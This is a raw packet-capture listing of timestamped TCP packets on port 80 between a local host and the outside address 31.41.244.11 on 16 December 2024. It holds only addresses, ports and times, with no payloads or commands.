Dec 16, 2024 11:03:18.427073002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.427182913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.428122997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.428224087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.428251028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.428389072 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.429286957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.429339886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.429397106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.429397106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.430459023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.430573940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.430605888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.430730104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.431628942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.431664944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.431814909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.432777882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.432934999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.432991982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.432991982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.433938980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.433993101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.434026957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.434170008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.435038090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.435161114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.435216904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.435216904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.436197996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.436306000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.436355114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.436439991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.437335014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.437450886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.437458992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.437508106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.438502073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.438601017 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.438656092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.438656092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.439666986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.439758062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.439831972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.439954996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.440815926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.440886974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.440918922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.441016912 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.441989899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.442100048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.442123890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.442187071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.443108082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.443223953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.443237066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.443286896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.444277048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.444350004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.444363117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.444432020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.445430040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.445538998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.445548058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.445652962 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.446588993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.446717024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.446769953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.446850061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.447762012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.447877884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.447930098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.447930098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.448890924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.449001074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.449031115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.449131012 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.450087070 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.450223923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.450289011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.450289011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.451309919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.451430082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.451494932 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.451562881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.452399969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.452466011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.584059000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.584186077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.584199905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.584316969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.584335089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.584412098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.584422112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.584458113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.585752010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.585812092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.585913897 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.586596966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.586678982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.586739063 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.586791992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.587819099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.587884903 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.587945938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.587994099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.588901043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.589020967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.589076042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.590110064 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.590205908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.590251923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.590327978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.591219902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.591315985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.591372013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.591430902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.592387915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.592442989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.592466116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.592592955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.593539000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.593600988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.593676090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.593842983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.594692945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.594803095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.594805002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.594852924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.595863104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.595952034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.596021891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.596075058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.596996069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.597054958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.597119093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.597172976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.598212957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.598267078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.598267078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.598371983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.599380016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.599436998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.599457979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.599492073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.600450039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.600507975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.600508928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.600631952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.601624966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.601747036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.601756096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.601820946 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.602798939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.603019953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.603131056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.603944063 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.604015112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.604087114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.604162931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.605252028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.605366945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.605424881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.606355906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.606415987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.606481075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.606538057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.607601881 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.607691050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.607747078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.607798100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.608714104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.608769894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.608817101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.608817101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.609783888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.609842062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.609878063 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.609951019 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.610909939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.610990047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.611022949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.611152887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.612066984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.612164974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.612236977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.612306118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.613219023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.613272905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.613348961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.613399029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.614330053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.614386082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.614389896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.614444017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.615551949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.615634918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.615705967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.615823984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.616712093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.616812944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.616816044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.616866112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.617835045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.617971897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.617981911 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.618041992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.619090080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.619126081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.619147062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.619183064 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.620183945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.620323896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.620337009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.620409966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.621298075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.621417046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.621423006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.621484995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.622462988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.622517109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.622622013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.623644114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.623696089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.623759985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.623853922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.624751091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.624844074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.624852896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.624912977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.625878096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.625993013 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.626013041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.626064062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.627060890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.627173901 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.627208948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.627238035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.628212929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.628297091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.628329039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.628448963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.629357100 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.629412889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.629586935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.629764080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.630521059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.630620003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.630685091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.630757093 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.631669998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.631768942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.631781101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.631824017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.632858992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.632894039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.632989883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.634008884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.634113073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.634167910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.634238958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.635150909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.635199070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.635289907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.635477066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.636293888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.636357069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.636461973 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.636534929 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.637451887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.637511015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.637568951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.637664080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.638637066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.638725042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.638791084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.638861895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.639775038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.639822960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.639900923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.639966011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.640958071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.641091108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.641140938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.641140938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.642086029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.642188072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.642194986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.642239094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.643245935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.643332958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.643342018 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.643493891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.644318104 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.644391060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.776141882 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.776197910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.776271105 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.776360035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.776402950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.776484966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.776582956 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.777565002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.777623892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.777632952 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.777699947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.778724909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.778817892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.778860092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.778909922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.779866934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.779926062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.779988050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.780056953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.781052113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.781136036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.781213045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.782200098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.782288074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.782318115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.782404900 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.783377886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.783456087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.783529043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.783574104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.784471989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.784528017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.784605980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.784655094 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.785881996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.785959005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.786055088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.786823988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.786911011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.786940098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.786998034 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.787965059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.788042068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.788094044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.788165092 CET	49800	80	192.168.2.5	31.41.244.11
